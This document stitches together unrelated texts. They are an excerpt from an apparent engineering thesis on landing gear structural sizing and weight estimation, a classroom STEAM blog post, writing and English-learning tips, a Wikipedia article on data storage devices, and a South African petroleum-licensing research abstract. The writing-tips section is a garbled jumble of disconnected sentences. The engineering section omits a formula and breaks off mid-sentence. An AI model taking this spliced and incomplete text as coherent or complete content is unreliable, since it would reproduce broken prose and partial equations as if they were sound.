L_1(\varphi_1) = \begin{bmatrix} 1 & 0 & 0 \\ 0 & \cos\varphi_1 & \sin\varphi_1 \\ 0 & -\sin\varphi_1 & \cos\varphi_1 \end{bmatrix}   (8.7a)

L_2(\varphi_2) = \begin{bmatrix} \cos\varphi_2 & 0 & -\sin\varphi_2 \\ 0 & 1 & 0 \\ \sin\varphi_2 & 0 & \cos\varphi_2 \end{bmatrix}   (8.7b)

L_3(\varphi_3) = \begin{bmatrix} \cos\varphi_3 & \sin\varphi_3 & 0 \\ -\sin\varphi_3 & \cos\varphi_3 & 0 \\ 0 & 0 & 1 \end{bmatrix}   (8.7c)

or

L_{BA} = \begin{bmatrix}
\cos\varphi_2\cos\varphi_3 & \sin\varphi_1\sin\varphi_2\cos\varphi_3 + \cos\varphi_1\sin\varphi_3 & -\cos\varphi_1\sin\varphi_2\cos\varphi_3 + \sin\varphi_1\sin\varphi_3 \\
-\cos\varphi_2\sin\varphi_3 & -\sin\varphi_1\sin\varphi_2\sin\varphi_3 + \cos\varphi_1\cos\varphi_3 & \cos\varphi_1\sin\varphi_2\sin\varphi_3 + \sin\varphi_1\cos\varphi_3 \\
\sin\varphi_2 & -\sin\varphi_1\cos\varphi_2 & \cos\varphi_1\cos\varphi_2
\end{bmatrix}   (8.9)
[Figure: rotation sequence from the aircraft (x, y, z) to the body (x3, y3, z3) reference frame: a) rotation φ1 about the x, x1-axis; b) rotation φ2 about the y1, y2-axis; c) rotation φ3 about the z2, z3-axis]
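The composite aircraft-to-body transformation can be checked numerically: applying the three elementary rotations of Eqs. (8.7a)-(8.7c) in sequence must yield an orthonormal matrix with, for example, sin φ2 in the (3,1) entry. A sketch (function names are my own):

```python
import numpy as np

def L1(p):
    # Rotation phi_1 about the x-axis, Eq. (8.7a)
    c, s = np.cos(p), np.sin(p)
    return np.array([[1, 0, 0], [0, c, s], [0, -s, c]])

def L2(p):
    # Rotation phi_2 about the y-axis, Eq. (8.7b)
    c, s = np.cos(p), np.sin(p)
    return np.array([[c, 0, -s], [0, 1, 0], [s, 0, c]])

def L3(p):
    # Rotation phi_3 about the z-axis, Eq. (8.7c)
    c, s = np.cos(p), np.sin(p)
    return np.array([[c, s, 0], [-s, c, 0], [0, 0, 1]])

def LBA(p1, p2, p3):
    # Composite aircraft-to-body transformation: rotations applied in the
    # sequence phi_1, phi_2, phi_3.
    return L3(p3) @ L2(p2) @ L1(p1)
```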
The main assembly drag strut and side strut structure is modeled as a space truss consisting of ball-and-socket joints and two-force members. As shown in Fig. 8.7, the loads applied to the cylinder consist of the side strut forces (F_side), the drag strut force (F_drag), an applied force with components F_x, F_y, and F_z, and an applied couple with moment components C_x, C_y, and C_z. Internal axial actions are obtained using the method of sections. Equilibrium equations are then used to determine the magnitude of the internal axial forces in the isolated portion of the truss. The shock strut cylinder, in addition to supporting the vertical load, also resists a moment due to asymmetric ground loads about the z-axis. This moment is transmitted from the truck beam assembly to the cylinder through the torsion links. Note that in the tandem configurations, the moment about the y-axis at the piston-beam centerline is ignored because of the pin-connection between the two. However, this moment must be considered in the dual-twin configuration, where the moment is resisted by the integrated axle/piston structure.

[Figure 8.7 Loads applied to the main assembly cylinder: side strut force F_side, drag strut force F_drag, applied force components F_x, F_y, F_z, and couple components C_x, C_y, C_z at the trunnion connection]
8.3.3.3. The Nose Assembly

As mentioned in the geometric definition section, an additional side strut, arranged symmetrically about the xz-plane, is modeled for the nose assembly. The addition of the second side strut results in a structure that is statically indeterminate to the first degree, as shown in Fig. 8.8. The reactions at the supports of the truss, and consequently the internal reactions, can be determined by Castigliano's theorem [46, p. 611]

u_j = \frac{\partial U}{\partial P_j} = \sum_{i=1}^{n} \frac{F_i l_i}{A_i E}\,\frac{\partial F_i}{\partial P_j}   (8.10)

where u_j is the deflection at the point of application of the load P_j, E is the modulus of elasticity, and l, F, and A are the length, internal force, and cross-sectional area of each member, respectively. The theorem gives the generalized displacement corresponding to the redundant, P_j, which is set equal to a value compatible with the support condition. This permits the solution of the redundant, and consequently all remaining internal actions, via equilibrium. As detailed in Appendix B, Section Two, the procedure is to first designate one of the reactions as redundant, and then determine a statically admissible set of internal actions in terms of the applied loads and the redundant load. By assuming a rigid support which allows no deflection, Eq. (8.10) is set to zero and solved for P_j.

[Figure 8.8 Loads applied to the nose assembly cylinder, with symmetric side strut forces F_side, drag strut force F_drag, applied force components F_x, F_y, F_z, and couple components C_x, C_y, C_z]
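For a truss indeterminate to the first degree, the procedure around Eq. (8.10) has a closed form: write each member force as F_i = F0_i + f_i·P_j, where F0_i comes from statics with the redundant removed and f_i is the force due to a unit redundant; setting the deflection at the redundant to zero then yields P_j directly. A sketch with hypothetical member data (all names are my own, not from the thesis):

```python
def solve_redundant(members):
    """Redundant load P_j for a first-degree indeterminate truss.

    members: list of (F0, f, length, area, E) tuples, one per member, where
    F0 is the member force with the redundant removed and f the force due to
    a unit redundant (hypothetical input format).

    Eq. (8.10) with u_j = 0 gives:
        sum((F0 + f*P) * f * L / (A*E)) = 0  =>  P = -sum(F0*f*L/AE) / sum(f*f*L/AE)
    """
    num = sum(F0 * f * L / (A * E) for F0, f, L, A, E in members)
    den = sum(f * f * L / (A * E) for F0, f, L, A, E in members)
    return -num / den
```

As a sanity check, two identical members sharing a load P split it evenly: the redundant comes out to P/2.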
8.3.3.4. The Trunnion
[Figure: trunnion loading, showing force components F_x, F_y, F_z, couple components C_y, C_z, and the trunnion length l_1]
8.3.4. Member Cross-sectional Area Sizing

With the resolution of the various ground loads, each structural member is subjected to a number of sets of internal actions that are due to combinations of extension, general bending, and torsion of the member. To ensure that the landing gear will not fail under the design condition, each structural member is sized such that the maximum stresses at limit loads will not exceed the allowables of the material and no permanent deformation is permitted. A description of selected cuts near major component joints and supports is given in Table 8.3. Normal and shear stresses acting on the cross section due to the internal actions were calculated at these locations and used in the sizing of the required member cross-sectional area.

Table 8.3 Section descriptions

Section | Description                               | Location (Figure 8.3)
1       | Axle-beam centerline intersection         | G/J
2       | Beam-piston centerline intersection       | F
3       | Piston                                    | E
4       | Cylinder/struts connection                | E
5       | Cylinder/trunnion centerline intersection | B
6       | Forward trunnion mounting                 | A
7       | Aft trunnion mounting                     | C
8       | Drag strut                                | A
9       | Side strut                                | D
The normal stresses induced on the structural members are determined by combining the effects of axial load and combined bending, while the shear stresses are determined by combining the effects of torsion and shear forces due to bending [47]. The normal stress (τ_xx) due to combined axial force and bending moments is given as

\tau_{xx} = \frac{N}{A} + \frac{M_y}{I_{yy}}\,z - \frac{M_z}{I_{zz}}\,y   (8.11)

where N is the maximum axial force, A is the cross-sectional area of the member, M_y and M_z are the internal moment components, and I_yy and I_zz are the second area moments about the y- and z-axis, respectively. As shown in Appendix B, Section Four, the extremum values of the normal stress on a circular-tube cross section under combined axial and bending actions are
\tau_{xx}^{max,\,min} = \frac{N}{A} \pm \frac{1}{\pi r^2 t}\sqrt{M_y^2 + M_z^2}   (8.12)

where r is the mean radius of the tube and t is the wall thickness. In the case of the drag and side struts, the last two terms in Eq. (8.11) are zero since both members are modeled as pin-ended two-force members; thus,

\tau_{xx} = \frac{N}{A}   (8.13)

The shear stress (τ_xs) due to combined transverse shear forces and torque is given as

\tau_{xs} = \frac{q(s)}{t} + (\tau_{xs})_{torque}   (8.14)

where q is the shear flow due to bending of a thin-walled tube, see Fig. 8.10. Given that

\tan\theta_{max} = -\frac{V_z}{V_y}   (8.15)

where θ_max is the polar angle at which the bending shear flow attains an extremum value and V_y and V_z are the shear force components, Eq. (8.14) then becomes

\tau_{xs}^{max,\,min} = \frac{1}{\pi r t}\left(\pm\sqrt{V_y^2 + V_z^2} + \frac{T}{2r}\right)   (8.16)

where T is the applied torque. Details of the solution are given in Appendix B, Section Four.

[Figure 8.10 Shear flow q(s) due to bending of a thin-walled tube]
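The extremum stresses of Eqs. (8.12) and (8.16) can be sketched as a small helper, assuming the usual thin-tube section properties A = 2πrt, I = πr³t, and J = 2πr³t (my assumption; the function name is also my own):

```python
import math

def tube_extreme_stresses(N, My, Mz, Vy, Vz, T, r, t):
    """Extreme normal and shear stresses on a thin-walled circular tube.

    Eq. (8.12): tau_xx = N/A +/- sqrt(My^2 + Mz^2) / (pi r^2 t)
    Eq. (8.16): tau_xs = (+/- sqrt(Vy^2 + Vz^2) + T/(2r)) / (pi r t)
    """
    A = 2 * math.pi * r * t          # thin-tube cross-sectional area
    Mb = math.hypot(My, Mz)          # resultant bending moment
    Vb = math.hypot(Vy, Vz)          # resultant transverse shear
    s_max = N / A + Mb / (math.pi * r**2 * t)
    s_min = N / A - Mb / (math.pi * r**2 * t)
    tau_max = ( Vb + T / (2 * r)) / (math.pi * r * t)
    tau_min = (-Vb + T / (2 * r)) / (math.pi * r * t)
    return (s_max, s_min), (tau_max, tau_min)
```

Under pure axial load the two normal extremes coincide at N/A, and under pure torque the two shear extremes coincide, which makes for easy sanity checks.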
8.3.4.2. Design Criteria

Although aircraft structural design calls for multiple load paths to be provided to give fail-safe capability, the concept cannot be applied in the design of the landing gear structures. Accordingly, the gear must be designed such that the fatigue life of the gear parts can be safely predicted or that the growth of cracks is slow enough to permit detection at normal inspection intervals [4]. The von Mises yield criterion for ductile materials, combined with a factor of safety, is used to determine the stress limit state. For the combined normal and shear stress state considered here, the Mises equivalent stress is given as [46, p. 368]

\sigma_{Mises} = \sqrt{\tau_{xx}^2 + 3\tau_{xs}^2}   (8.17)

and the factor of safety is defined as the ratio of the yield stress of the material to the Mises equivalent stress, that is,

F.S. = \frac{\sigma_{yield}}{\sigma_{Mises}}   (8.18)

If this value is less than the specified factor of safety, the cross-sectional area of the component is increased until the desired value is attained. In addition to the material limit state, the critical loads for column buckling of the drag and side struts are considered because of the large slenderness ratio associated with these members. The slenderness ratio is defined as the length of the member (L) divided by the minimum radius of gyration (ρ_min). Assuming a perfectly aligned axial load, the critical buckling load for a pin-ended two-force member can be calculated using Euler's formula [46, p. 635]

N_{cr} = \frac{\pi^2 E I}{L^2}   (8.19)

where E is the modulus of elasticity. In the case of a member with circular cross section, the moment of inertia I of the cross section is the same about any centroidal axis, and the member is as likely to buckle in one plane as another. For other shapes of the cross section, the critical load is computed by replacing I in Eq. (8.19) with I_min, the minimum second moment of the cross section (bending about the weak axis). Note that Euler's formula only accounts for buckling in the long-column mode and is valid for large slenderness ratios, e.g., L/ρ_min > 80 for 6061-T6 aluminum alloy. For slenderness ratios below this range, intermediate column buckling should be considered [48].

8.3.4.3. Sizing of the Cross-sectional Area

For thin-walled circular tubes, the cross-sectional area of the member is given as

A = \pi D t   (8.20)
where the mean diameter (D) and design thickness (t) are both design variables. Instead of using these two variables in the analysis directly, the machinability factor (k), defined as the mean diameter divided by the wall thickness, is introduced to account for tooling constraints [49]:

k = \frac{D}{t}   (8.21)

The factor has an upper limit of 40, and for the thin-wall approximation to be valid in the structural analysis k > 20. Thus, the machinability factor is limited to

20 \le k \le 40   (8.22)

By replacing t in Eq. (8.20) with Eq. (8.21) and using D as a limiting design variable, the desired cross-sectional area can then be determined by iterating on k. Note that the lower limit of k given in Eq. (8.22) may be violated in some instances. For structural members such as the axles, the truck beam, and the piston, which typically feature k values in the mid-teens, St. Venant's theory for torsion and flexure of thick-walled bars [50] should be used to calculate shear stresses. Essentially, the problem is broken down into torsion and bending problems and the shear stresses are calculated separately based on the linear theory of elasticity. In general, the diameter of each cylindrical component is a function of either the piston or the wheel dimension. In the case of the shock strut, it is assumed that the internal pressure is evenly distributed across the entire cross-sectional area of the piston. That is, the piston area is a function of the internal oleo pressure (P_2) and the maximum axial force:

A = \frac{N}{P_2} = \frac{\pi D_p^2}{4}   (8.23)

where D_p is the outer diameter of the piston. Rearrangement of Eq. (8.23) gives

D_p = \sqrt{\frac{4N}{\pi P_2}}   (8.24)
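The piston sizing of Eq. (8.24) and the tube-area relation of Eqs. (8.20)-(8.22) translate directly into code. A sketch (function names are my own; units must simply be consistent, e.g. lb and psi with inches):

```python
import math

def piston_outer_diameter(N, P2):
    """Eq. (8.24): piston OD from maximum axial force N and oleo pressure P2."""
    return math.sqrt(4 * N / (math.pi * P2))

def tube_area(D, k):
    """Eqs. (8.20)-(8.21): area of a thin-walled tube of mean diameter D and
    machinability factor k = D/t, enforcing the tooling limits of Eq. (8.22)."""
    if not 20 <= k <= 40:
        raise ValueError("machinability factor outside 20 <= k <= 40")
    t = D / k                # wall thickness from Eq. (8.21)
    return math.pi * D * t   # Eq. (8.20)
```

In the sizing loop described in the text, D is held as the limiting design variable and k is iterated until the required area is reached.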
Assuming a perfect fit between the piston lining and the inner cylinder wall, the minimum allowable mean diameter of the cylinder is obtained by adding the wall thickness of the cylinder to the piston outer diameter. To reduce the level of complexity, the minimum allowable mean diameter of the trunnion is assumed to be identical to that of the cylinder. Similar assumptions are made concerning the axle and truck beam, except that the outer diameter of the above members is treated as a function of the diameter of the wheel hub. In the case of the axle, the maximum allowable mean diameter is obtained by subtracting the axle wall thickness from the hub diameter. For the thin-walled I-section bar shown in Fig. 8.11, the cross-sectional area and principal centroidal second area moments are

A = t(2b + h)   (8.25)

I_{yy} = t\left[\frac{h^3}{12} + 2b\left(\frac{h}{2}\right)^2\right]   (8.26)

and

I_{zz} = \frac{b^3 t}{6}   (8.27)

where h is the web height and b is the width of the two flanges. Assuming that I_yy > I_zz, algebraic manipulation then results in

\frac{h}{b} > 2   (8.28)

and the z-axis is the weak axis in bending. The cross-sectional area is related to the second area moment by the minimum radius of gyration, that is,

A = \frac{I_{zz}}{\rho_{min}^2}   (8.29)

or, for the I-section,

\rho_{min} = \frac{b}{\sqrt{12 + 6h/b}}   (8.30)
[Figure 8.5 I-section truss bar, with web height h and flange width b]
Since only the cross-sectional area is used in the weight computation, it is not necessary
to determine the actual dimensions of the sectional height and width. Instead, one of the dimensions, usually the height, is treated as a function of the piston diameter and the other is then calculated with a predetermined h/b ratio.
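The I-section relations of Eqs. (8.25)-(8.27) and (8.30) are self-consistent: the minimum radius of gyration must satisfy A = I_zz/ρ_min², Eq. (8.29). A sketch that computes the properties and lets that identity be verified numerically (function name is my own):

```python
import math

def i_section_properties(h, b, t):
    """Thin-walled I-section: area, second area moments, and rho_min.

    h: web height, b: flange width, t: wall thickness.
    """
    A = t * (2 * b + h)                          # Eq. (8.25)
    Iyy = t * (h**3 / 12 + 2 * b * (h / 2)**2)   # Eq. (8.26)
    Izz = b**3 * t / 6                           # Eq. (8.27)
    rho_min = b / math.sqrt(12 + 6 * h / b)      # Eq. (8.30)
    return A, Iyy, Izz, rho_min
```

For h/b > 2 the code also confirms that I_yy > I_zz, i.e. that the z-axis is the weak axis in bending, as stated in the text.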
The final step of the analytical procedure is to calculate the weight of each member
based on its cross-sectional area, length, and the material density. Recall that seven different loading conditions were examined in the analysis, which results in seven sets of cross-sectional areas for each member. To ensure that the component will not fail under any of the seven loading conditions, the maximum cross-sectional area from the sets is selected as the final design value. Component weights are then calculated by multiplying each of the cross-sectional areas by the corresponding length and material density. The summation of these calculations then becomes the structural weight of the idealized analytical model.

8.3.6. Validation of the Analysis
For analysis validation purposes, the landing gears for the Boeing Models 707, 727,
737 and 747 were modeled and analyzed. The estimated structural weight, which includes the axle/truck, piston, cylinder, drag and side struts, and trunnion, accounts for roughly 75 percent of the total structural weight that can be represented in the model [43]. The remaining 25 percent of the gear structural weight is made up of the torsion links, fittings, miscellaneous hardware, and the internal oleo mechanism, e.g., the metering tube, seals, oil, pins, and bearings. Note that actual and estimated structural weights presented in Tables 8.4 and 8.5 only account for the components that were modeled in the analysis.
Table 8.4 Main assembly structural weight comparison

Aircraft   Estimated, lb   Actual, lb   Est/Act
B737       784             768          1.02
B727       1396            1656         0.84
B707       2322            2538         0.91
B747       9788            11323        0.86
Differences between the actual and estimated structural weights can be attributed to several factors. First, the models analyzed are extremely simple, i.e., structural members were represented with simple geometric shapes, and no consideration has been given to fillet radii, local structural reinforcement, bearing surfaces, etc. As for the analysis itself, simplistic equations were used to calculate the applied static and dynamic loads, and idealized structural arrangements were used to determine the member internal reactions. However, it should be noted that the results are consistent with Kraus' original analysis, in which an average deviation of 13 percent was cited [43].
eliminates the need to resort to an analytical method [App. A]. A detailed weight breakdown is provided in Table 8.6; the values are presented in terms of percent total landing gear weight.
Using the combined analytical and statistical approach presented here, the landing gear group weight for the Boeing Models 707, 727, 737, and 747 was calculated and compared with actual values. As presented in Table 8.7a, the analysis tends to underestimate the group weight as the aircraft takeoff weight increases. Linear regression analysis was used to calibrate the estimated group weights (W_est) so they agree with the actual values. Correction factors were calculated using the expression

where W is the aircraft weight. The correction factor is then combined with W_est to arrive at the calibrated landing gear group weight (W_cal), that is,
Table 8.7 Landing gear group weight comparison

a) Estimated group weight

Aircraft   Estimated, lb   Actual, lb   Est/Act
B737       4479            4382         1.02
B727       5976            6133         0.97
B707       9510            11216        0.85
B747       27973           31108        0.90
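The report's correction-factor expression is not reproduced in this excerpt, so the sketch below illustrates the general idea only: fit the actual-to-estimated ratio against a weight measure and use the fitted ratio to calibrate W_est. Using the estimated group weight itself as the regressor is an assumption made purely for illustration; the figures are those of Table 8.7a.

```python
# Illustrative calibration of the estimated landing gear group weights.
# The report's actual correction-factor expression is not shown in this
# excerpt; a linear fit of the actual/estimated ratio against the
# estimated weight is ASSUMED here for illustration only.
# Data: Table 8.7a (B737, B727, B707, B747).
est = [4479.0, 5976.0, 9510.0, 27973.0]   # estimated group weight, lb
act = [4382.0, 6133.0, 11216.0, 31108.0]  # actual group weight, lb

ratio = [a / e for a, e in zip(act, est)]

# Ordinary least squares for ratio = c0 + c1 * W
n = len(est)
mx = sum(est) / n
my = sum(ratio) / n
c1 = (sum((x - mx) * (y - my) for x, y in zip(est, ratio))
      / sum((x - mx) ** 2 for x in est))
c0 = my - c1 * mx

# Calibrated group weights, W_cal = W_est * (c0 + c1 * W_est)
cal = [e * (c0 + c1 * e) for e in est]
```

Consistent with the text, the underestimation grows with aircraft size, so the fitted correction factor increases with weight.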
Levers and Pulleys and Wedges, oh my! This week put all of the students' STEAM skills to the test. The students also had their resolve tested, and had to show grit and resilience by not giving up.
The day started with one of the toughest Instant Challenges yet! The students had to design a structure that was built as far above and below the top of a table as possible. It was only allowed to touch the table within a 30cm by 30cm square. The structure had to be self-supporting and could not be held up by a team member. The materials available were very limited – 1 pipe cleaner, 3 cups, 2 straws, a paper plate, 15cm of string, 2 elastics, and 2 mailing labels. They also had a very strict time limit. The structures were also scored on three factors: the height of the structure, if the structure extended at least 15cm above and 15cm below the top of the table, and how well the teams worked together. The students also had to estimate the total height of the structure and received additional points if they were within 10cm of the actual measurement. We discussed what the groups thought they did well, what they could change, and if they used any strategies to build their structures. The students thought it was an easier challenge than the previous ones, but I questioned whether it was easier or if they had become more skilled at completing the challenges.
After the challenge, we read a book called "Rosie Revere, Engineer". The book was about a young girl who dreamed of becoming an engineer. She would make gadgets and gizmos from anything she could find. Dissuaded by what she thought was her uncle laughing at one of her creations, she almost gave up on engineering until she met her great-aunt Rose, who rekindled her love of tinkering, and she continued her engineering dream. She learned the mantra of STEAM – the only time that you truly fail is if you quit.
Following the book, we learned about the 6 simple machines – levers, pulleys, wheels and axles, wedges, screws, and inclined planes. We watched three videos: OK GO's This Too Shall Pass, Bob Partington's Rube Slowberg, and Audri's Monster Trap. The videos showcased three different Rube Goldberg machines. Rube Goldberg machines are complex machines that solve a simple task, such as trapping a monster, much like the old Mousetrap game. While watching the videos, we tried to pick out the different simple machines used. The students were then given their task – create a Rube Goldberg machine! They had access to any material they wanted in the room to create the machine. They were challenged with using at least three different simple machines that comprised three chain reactions. The groups had to complete a Design Process Organizer for each simple machine/chain reaction they used. The activity put all of the students' learning in the 4C's, the Design Thinking Process, and their grit and resiliency to the test. Most groups got frustrated, some machines worked and some didn't, but no one quit.
We are now heading into the FINAL week of STEAM!
If they're all really short, the prose will sound panicked or staccato. I would write one every day if I had the time. In some ways, practicing speaking is even easier by yourself! Sometimes a sentence shares more than one thought. A lot of people are so scared of speaking English, it feels like they are blaming me for them not understanding. Do your students know what a subject and a predicate are? In English, sentence structure is an incredibly complicated thing. Sure, you can string a few sentences together to communicate your thoughts.
Make speaking easier by learning the different forms of any words you learn. But, the male as suitor demonstrates his good provider role by being the first on scene with nesting material. The light is very good and also, now, there are shadows of the leaves. Serve them the right mix of nourishing content, and make them crave more. Try to match the tone, speed and even the accent if you can. Mediocre writing bores your readers to tears.
She explained why she was upset with her boss. Absence of commas, on the other hand, indicates the information is essential to the sentence. Telling your employee or collaborator that you trust him is highly meaningful, as it means that you believe in his capabilities to make it happen. Study how they were formed and determine the root sentences to help you improve your own skills. Follow those rules that we all must follow in sentence structure, including using commas appropriately, using complete sentences and following appropriate spelling rules.
He admitted he had lost the winning ticket. It makes it feel more doable and not so overwhelming when you can approach it in this step-by-step way. Have a great rest of the week! Technology has brought to us incredible and increasingly cheaper ways to instantly communicate with others, regardless of where you are. If people don't open themselves they probably won't have enough patience to learn and to cooperate with others. Notice how there are different types of sentence structures in the passage.
When you have the opportunity, look for passages in books you have read that make good use of complex and compound sentences. Next, students can move to identifying the subject and predicates on their own in sentences, then they can write their own sentences. Using a semicolon is a stylistic choice that establishes a close relationship between the two sentences. Thank you very much in advance! My guess is, probably not. A comma splice occurs when two independent clauses are joined with just a comma.
Practicing Sentences with Gradual Release

From here, I like to have students complete subject and predicate puzzles. Isn't this what adds zest to our life? Melissa likes to go jogging in the mornings, and she's training for a marathon. Learn to hear the difference! This is important because, even with simple sentences, there are varying lengths and types of subjects and predicates. Anne Frank wrote in her famous diary, "How wonderful it is that nobody need wait a single moment before starting to improve the world." Check, however, to make sure that this solution does not result in short, choppy sentences. Students often struggle with understanding what actually constitutes a complete sentence, when a sentence ends, and how to edit their own sentences in their writing.

The Importance of Improving Sentence Structure

Imagine seeing all the pieces for a house laid out in front of you.
This guide will teach you an important aspect of the cultural fluency system that we teach every student here at Real Life English. Readers, on the other hand, do not usually recognize the specific mistakes in a document the way an editor or publisher would. My mom and dad said they were disappointed in me. Structure that sentence a bit better and he would have had a much more pleasant result. Creating fresh metaphors and mini-stories are things I still struggle with. If you create a sentence that describes 2 or more objects or actions, the different elements must be described using the same grammatical terms. So to make the sentence active we would write: 'Sally bathed the doll.'
See more examples of this on the page. Take a moment to connect subject with the noun part of the sentence – the who or what. While students might write compound sentences in their writing (and hopefully they do), adding in questions and compound sentences while first learning subject and predicate can be incredibly overwhelming. We will give you the answers next week in the comments section and on our Facebook page. The thief entered the room quietly, then opened the safe slowly and carefully. The general reason for this, at least in the United States, is that we are more direct and proactive about our communication.
Anyway, loved the post and the practical tips, Henneke. But nourishing content engages, delights, and inspires your readers. You might want to check out the book Made to Stick by Chip and Dan Heath, or The Tall Lady With the Iceberg by Anne Miller. What does this have to do with Hemingway? How can you practice speaking English? The easiest way to fix a run-on is to split the sentence into smaller sentences using a period. Revision: The results of the study were inconclusive; therefore, more research needs to be done on the topic. I really enjoy your style of writing and look forward to reading your articles.
Data storage device
From Wikipedia, the free encyclopedia
A data storage device is a device for recording (storing) information (data). Recording can be done using virtually any form of energy. A storage device may hold information, process information, or both. A device that only holds information is a recording medium. Devices that process information (data storage equipment) may either access a separate portable (removable) recording medium or a permanent component to store and retrieve information.

Electronic data storage is storage that requires electrical power to store and retrieve data. Most storage devices that do not require visual optics to read data fall into this category. Electronic data may be stored in either an analog or digital signal format. This type of data is considered to be electronically encoded data, whether or not it is electronically stored. Most electronic data storage media is considered permanent (non-volatile) storage, that is, the data will remain stored when power is removed from the device. In contrast, electronically stored information is considered volatile memory.
With the exception of barcodes and OCR data, electronic data storage is easier to revise and may be more cost effective than alternative methods due to smaller physical space requirements and the ease of replacing (rewriting) data on the same medium. However, the durability of methods such as printed data is still superior to that of most electronic storage media. The durability limitations may be overcome with the ease of duplicating (backing-up) electronic data.
Terminology
Devices that are not used exclusively for recording (e.g. hands, mouths, musical instruments) and devices that are intermediate in the storing/retrieving process (e.g. eyes, ears, cameras, scanners, microphones, speakers, monitors, projectors) are not usually considered storage devices. Devices that are exclusively for recording (e.g. printers), exclusively for reading (e.g. barcode readers), or devices that process only one form of information (e.g. phonographs) may or may not be considered storage devices. In computing these are known as input/output devices.
An organic brain may or may not be considered a data storage device.[1]
All information is data. However, not all data is information.
Data storage equipment
The equipment that accesses (reads and writes) stored information is often called a storage device. Data storage equipment uses either:
- portable methods (easily replaced);
- semi-portable methods, requiring mechanical disassembly tools and/or opening a chassis; or
- inseparable methods, meaning loss of memory if disconnected from the unit.
The following are examples of those methods:
Portable methods
- Hand crafting
- Flat surface: Printmaking, Photographic
- Fabrication: Automated assembly, Textile, Molding (process), Solid freeform fabrication
- Cylindrical accessing
- Card reader/drive
- Tape drive: Mono reel or reel-to-reel; Cassette player/recorder
- Disk accessing: Disk drive, Disk enclosure
- Cartridge accessing/connecting (tape/disk/circuitry)
- Peripheral networking
- Flash memory devices

Semi-portable methods
- Hard drive
- Circuitry with non-volatile RAM

Inseparable methods
- Circuitry with volatile RAM
- Neurons

Recording medium
A recording medium is a physical material that holds data expressed in any of the existing recording formats. With electronic media, the data and the recording medium are sometimes referred to as "software", despite the more common use of the word to describe computer software. With (traditional art) static media, art materials such as crayons may be considered both equipment and medium, as the wax, charcoal, or chalk material from the equipment becomes part of the surface of the medium.
Ancient and timeless examples

Optical
- Any object visible to the eye, used to mark a location, such as a stone, flag or skull.
- Any crafting material used to form shapes, such as clay, wood, metal, glass, wax.
- Quipu
- Any branding surface that would scar under intense heat.
- Any marking substance, such as paint, ink or chalk.
- Any surface that would hold a marking substance, such as papyrus, paper, skin.

Chemical
- DNA
- Pheromone
Modern examples by energy used

Chemical
- Dipstick

Thermodynamic
- Thermometer

Photochemical
- Photographic film

Mechanical
- Pins and holes: Punch card, Paper tape, Piano roll, Music box cylinder or disk
- Grooves (see also audio data): Phonograph cylinder, Gramophone record, DictaBelt (groove on plastic belt), Capacitance Electronic Disc

Magnetic storage
- Wire recording (stainless steel wire)
- Magnetic tape
- Floppy disk

Optical storage
- Photo paper
- Hologram
- Projected transparency
- Laserdisc
- Magneto-optical disc
- Compact disc
- Holographic versatile disc

Electrical
- Semiconductor used in volatile RAM microchips
- Floating gate transistor used in non-volatile memory cards
Modern examples by shape
A typical way to classify data storage media is to consider its shape and type of movement (or non-movement) relative to the read/write device(s) of the storage apparatus as listed:
Paper card storage
- Punched card (mechanical)

Tape storage (long, thin, flexible, linearly moving bands)
- Paper tape (mechanical)
- Magnetic tape (a tape passing one or more read/write/erase heads)

Disk storage (flat, round, rotating object)
- Gramophone record (used for distributing some 1980s home computer programs) (mechanical)
- Floppy disk, ZIP disk (removable) (magnetic)
- Holographic
- Optical disc such as CD-ROM, CD-R, CD-RW, DVD, DVD-R, DVD-RW, DVD+R, DVD+RW, DVD-RAM, Blu-ray, Minidisc
- Hard disk (magnetic)

Magnetic bubble memory

Flash memory/memory card (solid state semiconductor memory)
- xD-Picture Card
- MMC
- USB flash drive (also known as a "thumb drive" or "keydrive")
- SmartMedia
- CompactFlash I and II
- Secure Digital
- SONY Memory stick (Std/Duo/Pro/MagicGate versions)
- Solid state disk
Bekenstein (2003) foresees that miniaturization might lead to the invention of devices that store bits on a single atom.
See also
- Computer data storage
- Recording formats
- Content format
- Multimedia
- Streaming media
- Blank media tax
- Medium format (film)
- Nonlinear medium (random access)
- Library

References
Bekenstein, Jacob D. (2003, August). Information in the holographic universe. Scientific American.

Bibliography
Bennett, John C. (1997). "JISC/NPO Studies on the Preservation of Electronic Materials: A Framework of Data Types and Formats, and Issues Affecting the Long Term Preservation of Digital Material". British Library Research and Innovation Report 50.

External links
Historical Notes about the Cost of Hard Drive Storage Space
Original Research

Evaluating transformation progress of historically disadvantaged South Africans: Programme perspective on the downstream petroleum industry

Submitted: 31 January 2019 | Published: 27 June 2019

About the author(s)
Msuthukazi Makiva, School of Government, Faculty of Economic and Management Sciences, University of the Western Cape, Cape Town, South Africa
Isioma Ile, School of Government, Faculty of Economic and Management Sciences, University of the Western Cape, Cape Town, South Africa
Omololu M. Fagbadebo, Department of Public Management, Law and Economics, Durban University of Technology, Pietermaritzburg, South Africa
Abstract

Background: Since the dawn of democracy in 1994, the South African (SA) government has sought to ensure economic transformation of historically disadvantaged people, using a series of programmes and projects. The petroleum downstream of SA, regulated by the Department of Energy, is among the industries that government uses to maximise transformation. Through a licensing sub-programme, one major condition stipulated prior to awarding licences to operate is the inclusion of historically disadvantaged South Africans in the business plans.

Objectives: This article evaluates the extent to which one of the sub-programmes developed to empower historically disadvantaged South Africans (HDSA) in the downstream petroleum industry (petroleum licensing) meets the requirements of the identified relevant evaluation criteria, based on the guidelines of the Development Assistance Committee of the Organisation for Economic Cooperation and Development (DAC/OECD).

Method: This sub-programme evaluation (a partial summative evaluation) is critical, as it sought to determine the sub-programme's alignment to the tenets of government policy of addressing past inequity by means of economic ownership. The DAC/OECD evaluation criteria were selected to measure the relevance, effectiveness, efficiency, impact and sustainability of the sub-programme. The justification for using this model is that it is appropriate as a public policy response and management tool, especially for developing countries. Some of these measurements were conducted qualitatively, while others were done quantitatively.

Results: Emerging data trends analysed indicate that there is a great deal of efficiency in the delivery of licences to operate in the downstream petroleum sector, as these were issued in high volumes. The same cannot be said about the HDSAs' economic empowerment by means of 'dealer' and 'company' ownership.
Conclusion: Research concludes that the lack of critical resources, such as funding, land, infrastructure and critical skills, was the main reason why the sub-programme is DAC/OECD non-compliant.
"What's the best way to learn a language?"

Here I will give you several tips for learning English. They are based on my own experience in learning languages. These tips helped me when I learned a foreign language, and I hope that they will help you as you work on improving your English.
1. Want to learn.
